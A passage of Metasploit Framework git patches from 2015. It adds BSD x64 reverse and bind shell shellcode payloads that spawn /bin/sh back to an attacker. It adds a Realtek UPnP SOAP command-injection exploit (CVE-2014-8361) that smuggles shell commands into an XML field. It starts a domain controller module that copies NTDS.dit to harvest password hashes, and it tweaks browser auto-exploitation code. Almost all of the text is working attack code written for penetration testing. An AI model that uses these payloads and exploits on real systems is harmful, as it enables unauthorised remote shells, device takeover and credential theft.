+            "\x04\x1e"             +#	add    $0x1e,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x89\xc7"         +#	mov    %rax,%rdi                   #
+            "\x6a\x5a"             +#	pushq  $0x5a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x5a"             +#	add    $0x5a,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x59"             +#	add    $0x59,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x52"                 +#   push   %rdx                        #
+            "\x48\xbf\x2f\x2f"     +#   mov "//"                           #
+            "\x62\x69\x6e\x2f"     +#   "bin/sh"                           #
+            "\x73\x68"             +#   mov    $0x68732f6e69622f2f,%rdi    #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x04\x39"             +#	add    $0x39,%al                   #
+            "\x0f\x05"              #   syscall                            #
+        }
+      ))
+  end
+
+end
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
new file mode 100644
index 0000000000..02887dc3f2
--- /dev/null
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -0,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
+      'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 85, 'ADDR6' ],
+              'LPORT'    => [ 79, 'n' ],
+              'SCOPEID'  => [ 101,  'V' ]
+            },
+          'Payload' =>
+            "\x6a\x61"             +#  	pushq  $0x61                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x99"                 +#  	cltd                               #
+            "\x6a\x1c"             +#  	pushq  $0x1c                       #
+            "\x5f"                 +#  	pop    %rdi                        #
+            "\x6a\x01"             +#   pushq  $0x1                        #
+            "\x5e"                 +#  	pop    %rsi                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x97"             +#   xchg   %rax,%rdi                   #
+            "\x04\x3e"             +#   add    $0x3e,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#   inc    %esi                        #
+            "\x04\x59"             +#   add    $0x59,%al                   #
+            "\x0f\x05"             +#  	syscall                            #
+            "\xff\xce"             +#  	dec    %esi                        #
+            "\xff\xce"             +#   dec    %esi                        #
+            "\x04\x58"             +#   add    $0x58,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xe9\x23\x00\x00\x00" +#   jmpq   <forth>                     #
+	    # back:
+            "\x5e"                 +#   pop    %rsi                        #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5a"                 +#  	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     +#   add    $0x62,%ax                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x99"                 +#  	cltd                               #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" +#  	"in/sh",%rdi                       #
+            "\x57"                 +#  	push   %rdi                        #
+            "\x48\x89\xe7"         +#   mov    %rsp,%rdi                   #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x57"                 +#  	push   %rdi                        #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x04\x3b"             +#   add    $0x3b,%al                   #
+            "\x0f\x05"             +# 	syscall                            #
+            # forth:
+            "\xe8\xd8\xff\xff\xff" +#   callq <back>                       #
+	    # sockaddr_in6
+            "\x00\x1c\x11\x5c"     +#   AF_INET6+port                      #
+            "\x00\x00\x00\x00"     +#   no-one-cares                       #
+            "\x00\x00\x00\x00"     +#   IPv6-                              #
+            "\x00\x00\x00\x00"     +#   addr-                              #
+            "\x00\x00\x00\x00"     +#   in-                                #
+            "\x00\x00\x00\x01"     +#   16 bytes                           #
+            "\x00\x00\x00\x00"      #   Scope ID                           #
+        }
+      ))
+      register_options([
+         OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+      ])
+  end
+
+end
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
new file mode 100644
index 0000000000..1641309826
--- /dev/null
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Reverse TCP Inline',
+      'Description'   => 'Connect back to attacker and spawn a command shell',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 39, 'ADDR' ],
+              'LPORT'    => [ 37, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#	pushq  $0x61                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x99"                 +#	cltd                               #
+            "\x6a\x02"             +#	pushq  $0x2                        #
+            "\x5f"                 +#	pop    %rdi                        #
+            "\x6a\x01"             +#	pushq  $0x1                        #
+            "\x5e"                 +#	pop    %rsi                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x97"             +#	xchg   %rax,%rdi                   #
+            "\x04\x58"             +#	add    $0x58,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x59"             +#	add    $0x59,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xce"             +#	dec    %esi                        #
+            "\xff\xce"             +#	dec    %esi                        #
+            "\x04\x58"             +#	add    $0x58,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x52"                 +#	push   %rdx                        #
+            "\x48\xbb\x00\x02\x11" +#   mov    ...                         #
+            "\x5c\x7f\x00\x00\x01" +#   mov    $0x100007f5c110200,%rbx     #
+            "\x53"                 +#	push   %rbx                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x6a\x10"             +#	pushq  $0x10                       #
+            "\x5a"                 +#	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     +#	add    $0x62,%ax                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x99"                 +#	cltd                               #
+            "\x52"                 +#	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" +# 	"in/sh", %rdi                      #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x04\x3b"             +#	add    $0x3b,%al                   #
+            "\x0f\x05"              #	syscall                            #
+        }
+      ))
+  end
+
+end

From 0b580acfb4aa0a6dbbff0d12a503f965712a5a16 Mon Sep 17 00:00:00 2001
From: Balazs Bucsay <github@rycon.hu>
Date: Sat, 2 May 2015 21:16:50 +0200
Subject: [PATCH 0047/1013] \t removed

---
 modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb    | 2 +-
 modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb | 4 ++--
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
index ce5aa4d830..2738f294ab 100644
--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -69,7 +69,7 @@ module Metasploit3
             "\x0f\x05"             +#  	syscall                            #
             "\x52"                 +# 	push   %rdx                        #
             "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
-	    "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
+            "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
             "\x57"                 +#	push   %rdi                        #
             "\x48\x89\xe7"         +# 	mov    %rsp,%rdi                   #
             "\x52"                 +# 	push   %rdx                        #
diff --git a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
index 02887dc3f2..7a44baa7e7 100644
--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -53,7 +53,7 @@ module Metasploit3
             "\x04\x58"             +#   add    $0x58,%al                   #
             "\x0f\x05"             +#   syscall                            #
             "\xe9\x23\x00\x00\x00" +#   jmpq   <forth>                     #
-	    # back:
+            # back:
             "\x5e"                 +#   pop    %rsi                        #
             "\x6a\x1c"             +#   pushq  $0x1c                       #
             "\x5a"                 +#  	pop    %rdx                        #
@@ -72,7 +72,7 @@ module Metasploit3
             "\x0f\x05"             +# 	syscall                            #
             # forth:
             "\xe8\xd8\xff\xff\xff" +#   callq <back>                       #
-	    # sockaddr_in6
+            # sockaddr_in6
             "\x00\x1c\x11\x5c"     +#   AF_INET6+port                      #
             "\x00\x00\x00\x00"     +#   no-one-cares                       #
             "\x00\x00\x00\x00"     +#   IPv6-                              #

From 6fbce56a522bc1d07cb087c155d1c77db6079b57 Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Sun, 3 May 2015 18:09:22 +0200
Subject: [PATCH 0048/1013] realtek upnp command injection

---
 .../http/realtek_miniigd_upnp_exec_noauth.rb  | 144 ++++++++++++++++++
 1 file changed, 144 insertions(+)
 create mode 100644 modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb

diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
new file mode 100644
index 0000000000..b9cdf2cdb1
--- /dev/null
+++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -0,0 +1,144 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
+      'Description' => %q{
+        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command 
+        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, 
+        there is no output for the executed command. 
+        This module has been tested in emulation on a Trendnet TEW-731BR router.
+      },
+      'Author'      =>
+        [
+          'Ricky "HeadlessZeke" Lawshae', # Vulnerability discovery
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-8361'],
+          ['ZDI', '15-155'],
+          ['URL', 'http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Software-Development-KITchen-sink/ba-p/6745115#.VWVfsM_tmko'],
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10055']
+        ],
+      'DisclosureDate' => 'Apr 24 2015',
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+      'Targets' =>
+        [
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSBE
+            }
+          ],
+        ],
+      'DefaultTarget'    => 0
+      ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
+
+    register_options(
+      [
+        Opt::RPORT(52869) # port of UPnP SOAP webinterface
+      ], self.class)
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+        'uri' => '/picsdesc.xml'
+      })
+      if res && [200, 301, 302].include?(res.code) && res.headers['Server'] =~ /miniupnpd\/1.0 UPnP\/1.0/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 50
+    )
+  end
+
+  def execute_command(cmd, opts)
+    uri = '/wanipcn.xml'
+
+    new_portmapping_descr = rand_text_alpha(8)
+    new_external_port = rand(32767) + 32768
+    new_internal_port = rand(32767) + 32768
+
+    # We need something like this:
+    #cmd = "echo -en \\\x7f\\\x45\\\x4c\\\x46\\\x01  > /var/tmp/pwdn"
+    cmd = cmd.gsub("\\\\", "\\\\\\\\\\")
+
+    soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"
+
+    data_cmd = "<?xml version=\"1.0\"?>"
+    data_cmd << "<SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">"
+    data_cmd << "<SOAP-ENV:Body>"
+    data_cmd << "<m:AddPortMapping xmlns:m=\"urn:schemas-upnp-org:service:WANIPConnection:1\">"
+    data_cmd << "<NewLeaseDuration></NewLeaseDuration>"
+    data_cmd << "<NewInternalClient>`#{cmd}`</NewInternalClient>"
+    data_cmd << "<NewEnabled>1</NewEnabled>"
+    data_cmd << "<NewExternalPort>#{new_external_port}</NewExternalPort>"
+    data_cmd << "<NewRemoteHost></NewRemoteHost>"
+    data_cmd << "<NewProtocol>TCP</NewProtocol>"
+    data_cmd << "<NewInternalPort>#{new_internal_port}</NewInternalPort>"
+    data_cmd << "</m:AddPortMapping>"
+    data_cmd << "</SOAP-ENV:Body>"
+    data_cmd << "</SOAP-ENV:Envelope>"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'vars_get' => {
+          'service' => 'WANIPConn1'
+        },
+        'ctype' => "text/xml",
+        'method' => 'POST',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+        'data' => data_cmd
+      })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

From 53043dcbbcea27dc95238c0fa607852ddef839af Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Sun, 3 May 2015 18:14:51 +0200
Subject: [PATCH 0049/1013] make msftidy happy

---
 .../exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
index b9cdf2cdb1..2bc2cd6d25 100644
--- a/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/realtek_miniigd_upnp_exec_noauth.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
     super(update_info(info,
       'Name'        => 'Realtek SDK Miniigd UPnP SOAP Command Execution',
       'Description' => %q{
-        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command 
-        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability, 
-        there is no output for the executed command. 
+        Different devices using the Realtek SDK with the miniigd daemon are vulnerable to OS command
+        injection in the UPnP SOAP interface. Since it is a blind OS command injection vulnerability,
+        there is no output for the executed command.
         This module has been tested in emulation on a Trendnet TEW-731BR router.
       },
       'Author'      =>

From c7e05448e74addec52906a58866e4accf2e856e4 Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Mon, 4 May 2015 12:55:21 +0200
Subject: [PATCH 0050/1013] various MIPS vs MIPSBE fixes

---
 modules/exploits/linux/http/dlink_upnp_exec_noauth.rb  | 2 +-
 modules/exploits/linux/http/fritzbox_echo_exec.rb      | 2 +-
 modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb | 2 +-
 3 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
index 1f9b293979..fc89dd0e39 100644
--- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
               'Platform' => 'linux',
-              'Arch'     => ARCH_MIPS
+              'Arch'     => ARCH_MIPSBE
             }
           ],
         ],
diff --git a/modules/exploits/linux/http/fritzbox_echo_exec.rb b/modules/exploits/linux/http/fritzbox_echo_exec.rb
index 698afb9fba..277b464beb 100644
--- a/modules/exploits/linux/http/fritzbox_echo_exec.rb
+++ b/modules/exploits/linux/http/fritzbox_echo_exec.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'MIPS Big Endian',
             {
               'Platform' => 'linux',
-              'Arch'     => ARCH_MIPS
+              'Arch'     => ARCH_MIPSBE
             }
           ],
         ],
diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
index eacb27174a..d65f048c33 100644
--- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
+++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb
@@ -43,7 +43,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'MIPS Big Endian', # unknown if there are big endian devices out there
             {
               'Platform' => 'linux',
-              'Arch'     => ARCH_MIPS
+              'Arch'     => ARCH_MIPSBE
             }
           ]
         ],

From e0c64038a7be81332bebcdee55a56bb0de3d59f5 Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Mon, 4 May 2015 15:07:27 -0500
Subject: [PATCH 0051/1013] start new ddomain hashdump post module

module checks for all preconditions so far
including that Domain Services are running,
that we are Admin, that we have bypassed uac
and that it is a supported version of windows.

MSP-12358
---
 .../gather/credentials/domain_hashdump.rb     | 78 +++++++++++++++++++
 1 file changed, 78 insertions(+)
 create mode 100644 modules/post/windows/gather/credentials/domain_hashdump.rb

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
new file mode 100644
index 0000000000..116857fb01
--- /dev/null
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/auxiliary/report'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Registry
+  include Msf::Auxiliary::Report
+  include Msf::Post::Windows::Services
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Windows::ShadowCopy
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Windows Domain Controller Hashdump',
+      'Description'   => %q{
+        This module attempts to copy the NTDS.dit database from a live Domain Controller
+        and then parse out all of the User Accounts. It saves all of the captured password
+        hashes, including historical ones.
+  },
+      'License'       => MSF_LICENSE,
+      'Author'        => ['theLightCosine'],
+      'Platform'      => [ 'win' ],
+      'SessionTypes'  => [ 'meterpreter' ]
+  ))
+  end
+
+  def run
+    if preconditions_met?
+      copy_database_file
+    end
+  end
+
+  def copy_database_file
+    database_file_path = nil
+    case  sysinfo["OS"]
+      when /2003/
+
+      when /2008|2012/
+      else
+        print_error "This version of Windows in unsupported"
+    end
+  end
+
+  def is_domain_controller?
+    status = false
+    service_list.each do |svc|
+      if svc[:name] == 'NTDS'
+        status = true
+        break
+      end
+    end
+    status
+  end
+
+  def preconditions_met?
+    status = true
+    unless is_domain_controller?
+      print_error "This does not appear to be an AD Domain Controller"
+      status = false
+    end
+    unless is_admin?
+      print_error "This module requires Admin privs to run"
+      status = false
+    end
+    if is_uac_enabled?
+      print_error "This module requires UAC to be bypassed first"
+      status = false
+    end
+    return status
+  end
+
+
+end

From 3c9c578a3d4178000ab75257538b81c19796275f Mon Sep 17 00:00:00 2001
From: David Maloney <DMaloney@rapid7.com>
Date: Mon, 4 May 2015 15:35:36 -0500
Subject: [PATCH 0052/1013] ntdsutil method in place

ntdsutil method built out to make a copy
of ntds.dit on later version of Winbdows Server

MSP-12358
---
 .../gather/credentials/domain_hashdump.rb     | 27 +++++++++++++++++--
 1 file changed, 25 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/domain_hashdump.rb b/modules/post/windows/gather/credentials/domain_hashdump.rb
index 116857fb01..908088c96c 100644
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Post
 
   def run
     if preconditions_met?
-      copy_database_file
+      ntds_file = copy_database_file
     end
   end
 
@@ -39,11 +39,13 @@ class Metasploit3 < Msf::Post
     database_file_path = nil
     case  sysinfo["OS"]
       when /2003/
-
+        database_file_path = vss_method
       when /2008|2012/
+        database_file_path = ntdsutil_method
       else
         print_error "This version of Windows in unsupported"
     end
+    database_file_path
   end
 
   def is_domain_controller?
@@ -57,6 +59,20 @@ class Metasploit3 < Msf::Post
     status
   end
 
+  def ntdsutil_method
+    tmp_path = "#{expand_path("%TEMP%")}\\#{Rex::Text.rand_text_alpha((rand(8)+6))}"
+    command_arguments = "\"activate instance ntds\" \"ifm\" \"Create Full #{tmp_path}\" quit quit"
+    result = cmd_exec("ntdsutil.exe", command_arguments)
+    if result.include? "IFM media created successfully"
+      file_path = "#{tmp_path}\\Active Directory\\ntds.dit"
+    else
+      print_error "There was an error copying the ntds.dit file!"
+      file_path = nil
+    end
+    file_path
+  end
+
+
   def preconditions_met?
     status = true
     unless is_domain_controller?
@@ -71,8 +87,15 @@ class Metasploit3 < Msf::Post
       print_error "This module requires UAC to be bypassed first"
       status = false
     end
+    if is_system?
+      print_error "Volume Shadow Copy will not work properly as SYSTEM, migrate to a real user"
+      status = false
+    end
     return status
   end
 
+  def vss_method
+
+  end
 
 end

From c8123c147f6a0780f52719ccf79d21341a94052a Mon Sep 17 00:00:00 2001
From: m-1-k-3 <devnull@s3cu1ty.de>
Date: Tue, 5 May 2015 20:57:05 +0200
Subject: [PATCH 0053/1013] upnp vs hnap

---
 ...header_exec_noauth.rb => dlink_hnap_header_exec_noauth.rb} | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
 rename modules/exploits/linux/http/{dlink_upnp_header_exec_noauth.rb => dlink_hnap_header_exec_noauth.rb} (97%)

diff --git a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb
similarity index 97%
rename from modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
rename to modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb
index 5b57976022..0f001df572 100644
--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_hnap_header_exec_noauth.rb
@@ -13,9 +13,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
+      'Name'        => 'D-Link Devices HNAP SOAPAction-Header Command Execution',
       'Description' => %q{
-        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
+        Different D-Link Routers are vulnerable to OS command injection in the HNAP SOAP
         interface. Since it is a blind OS command injection vulnerability, there is no
         output for the executed command. This module has been tested on a DIR-645 device.
         The following devices are also reported as affected: DAP-1522 revB, DAP-1650 revB,

From 95f087ffd3bbe5637906cd89d56ec57c9a4b110b Mon Sep 17 00:00:00 2001
From: wchen-r7 <wei_chen@rapid7.com>
Date: Thu, 7 May 2015 19:26:38 -0500
Subject: [PATCH 0054/1013] Some progress

---
 lib/msf/core/exploit/browserautopwnv2.rb  | 36 +++++++++++++++++++----
 modules/exploits/multi/browser/autopwn.rb |  6 ++--
 2 files changed, 33 insertions(+), 9 deletions(-)

diff --git a/lib/msf/core/exploit/browserautopwnv2.rb b/lib/msf/core/exploit/browserautopwnv2.rb
index b3b119514d..6ac1624a76 100644
--- a/lib/msf/core/exploit/browserautopwnv2.rb
+++ b/lib/msf/core/exploit/browserautopwnv2.rb
@@ -40,6 +40,10 @@ module Msf
       # First we're going to avoid using #find_all because that gets very slow.
       framework.exploits.each_pair do |fullname, plader_holder|
         next if !fullname.include?('browser') || self.fullname == "exploit/#{fullname}"
+
+        # Regex search
+        next if datastore['Include'] && fullname !~ datastore['Include']
+
         mod = framework.exploits.create(fullname)
         unless mod
           print_status("Failed to load: #{fullname}")
@@ -64,8 +68,9 @@ module Msf
       xploit.datastore['SSL'] = datastore['SSL']                  # Use SSL or not
       xploit.datastore['SSLVersion'] = datastore['SSLVersion']    # SSL Version
       xploit.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0' # Attacker's IP
-      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"   # A unique resource URI for the exploit
-      xploit.datastore['MODULEOWNER'] = 'BAP'                      # Let other mixins know we're in BrowserAutoPwn mode
+      xploit.datastore['URIPATH'] = "/#{assign_module_resource}"  # A unique resource URI for the exploit
+      xploit.datastore['SRVHOST'] = datastore['SRVHOST']          # Exploit's host
+      xploit.datastore['MODULEOWNER'] = 'BAP'                     # Let other mixins know we're in BrowserAutoPwn mode
     end
 
 
@@ -175,6 +180,26 @@ module Msf
     end
 
 
+    def get_selected_payload_name(platform)
+      payload_name = datastore["PAYLOAD_#{platform.upcase}"]
+      p = framework.payloads.create(payload_name)
+
+      # The payload is legit, we can use it.
+      return payload_name if p
+
+      default = DEFAULT_PAYLOADS[platform]['payload']
+      print_status("Unknown payload set: #{payload_name}. Falling back to: #{default}.")
+
+      # The user has configured some unknown payload that we can't use,
+      # fall back to default.
+      default
+    end
+
+    def get_selected_payload_lport(platform)
+      datastore["PAYLOAD_#{platform.upcase}_LPORT"]
+    end
+
+
     # Creates payload listeners.
     #
     # @note INCOMPLETE
@@ -188,9 +213,9 @@ module Msf
         next unless is_payload_handler_wanted?(listener_info['payload'])
 
         multi_handler = framework.modules.create('exploit/multi/handler')
-        multi_handler.datastore['LHOST'] = '0.0.0.0'
-        multi_handler.datastore['PAYLOAD'] = listener_info['payload']
-        multi_handler.datastore['LPORT'] = listener_info['lport']
+        multi_handler.datastore['LHOST'] = datastore['LHOST'] || '0.0.0.0'
+        multi_handler.datastore['PAYLOAD'] = get_selected_payload_name(platform)
+        multi_handler.datastore['LPORT'] = get_selected_payload_lport(platform)
         multi_handler.datastore['EXITONSESSION'] = false
         multi_handler.datastore['EXITFUNC'] = 'thread'
         multi_handler.datastore['MODULEOWNER'] = 'BAP'
@@ -271,6 +296,7 @@ module Msf
     def setup
       t1 = Time.now
       self.datastore['MODULEOWNER'] = 'BAP'
+      self.datastore['DisablePayloadHandler'] = true
       super
       @bap_exploits = []
 
diff --git a/modules/exploits/multi/browser/autopwn.rb b/modules/exploits/multi/browser/autopwn.rb
index 61c987bb6d..a7c457e17f 100644
